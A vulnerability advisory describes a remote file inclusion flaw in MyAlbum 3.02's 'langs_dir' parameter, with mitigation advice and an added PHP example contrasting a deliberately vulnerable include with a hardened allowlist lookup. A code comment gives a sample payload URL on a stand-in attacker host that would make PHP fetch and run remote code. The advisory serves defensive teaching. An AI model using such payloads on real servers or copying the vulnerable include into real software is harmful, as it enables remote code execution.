Vendor: MyAlbum
By: Silahsiz Kuvvetler The TURKISH DEVELOPER
CVSS: 8.8 (HIGH)
Vulnerability Class: Remote File Inclusion
CWE: 98
Product Name: MyAlbum
Affected Version From: 3.02
Affected Version To: 3.02
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006
MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Vulnerability
MyAlbum version 3.02, and possibly other versions, is vulnerable to remote file inclusion. The 'langs_dir' parameter used by the language.inc.php script is not validated before it is used in an include statement, so a remote attacker can supply an arbitrary path or URL and have PHP include it. On a host where PHP's URL wrappers are enabled for include (allow_url_fopen, and on PHP 5.2 or later allow_url_include), this allows a file hosted on an attacker-controlled server to be fetched and executed, giving arbitrary code execution in the context of the web server process; where remote wrappers are disabled, the flaw still allows inclusion of arbitrary local files.
Mitigation:
Never pass request-controlled data into include or require. Validate the language selection against an allowlist of known values (for example the files actually present in the language directory) rather than attempting to sanitize an arbitrary path, and keep the directory itself fixed in the application. Independently of the code fix, set allow_url_include (PHP 5.2 and later) and register_globals to Off in php.ini so that remote URLs cannot be included even if a check is bypassed, and run the web server under a restricted account so that any included file executes with minimal privileges.
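The following PHP is an added example and is not MyAlbum's source code. It reconstructs the pattern the advisory describes (a request-controlled directory spliced into an include) and places a hardened lookup beside it. The function names, the langs directory, the lang query parameter and the language-code regular expression are assumptions made for the illustration.

```php
<?php
// Added example, not MyAlbum's source. It reconstructs the pattern the
// advisory describes and shows a hardened replacement. The names used here
// (load_language_vulnerable, language_file, the 'langs' directory and the
// 'lang' query parameter) are assumptions made for this illustration.

// --- Vulnerable pattern (do not deploy) ----------------------------------
// If $langs_dir is filled from the request (via register_globals, which
// PHP 4 and 5.x allowed, or an explicit $_GET read), the caller decides
// which file is included. With URL wrappers enabled for include
// (allow_url_fopen, plus allow_url_include on PHP >= 5.2) a value such as
// http://attacker.example/x.txt? makes PHP fetch and execute remote code;
// without them the same code is still a local file inclusion.
function load_language_vulnerable(string $langs_dir, string $lang): string
{
    // The caller then does: include load_language_vulnerable(...);
    return $langs_dir . '/' . $lang . '.php';
}

// --- Hardened lookup -----------------------------------------------------
// 1. The directory is a constant; the request never chooses it.
// 2. The language name must match a strict pattern (e.g. "en", "pt_BR").
// 3. It must be one of the files actually present in that directory.
// 4. The resolved path must still lie inside the directory (realpath
//    collapses "..", symlinks and encoding tricks before the comparison).
const LANGS_DIR = __DIR__ . '/langs';

function allowed_languages(string $dir): array
{
    $names = [];
    foreach (glob($dir . '/*.php') ?: [] as $file) {
        $names[] = basename($file, '.php');
    }
    return $names;
}

function language_file(string $lang): string
{
    if (!preg_match('/^[a-z]{2,3}(_[A-Z]{2})?$/', $lang)) {
        throw new InvalidArgumentException('malformed language code');
    }
    if (!in_array($lang, allowed_languages(LANGS_DIR), true)) {
        throw new InvalidArgumentException('unknown language');
    }
    $base = realpath(LANGS_DIR);
    $path = realpath(LANGS_DIR . '/' . $lang . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file resolves outside ' . LANGS_DIR);
    }
    return $path;
}

// Only the language code comes from the request; the directory does not.
// The include is done at file scope so the language file's variables land
// in the global scope as the rest of the application expects.
try {
    include language_file($_GET['lang'] ?? 'en');
} catch (Exception $e) {
    http_response_code(400);
    exit('invalid language selection');
}
```

The hardened version is written for PHP 7 or later (scalar type declarations, constant expressions in const). Alongside the code change, set allow_url_include = Off (PHP 5.2 and later) and register_globals = Off in php.ini and run PHP under a low-privilege account; those settings limit the impact should the allowlist check ever be bypassed.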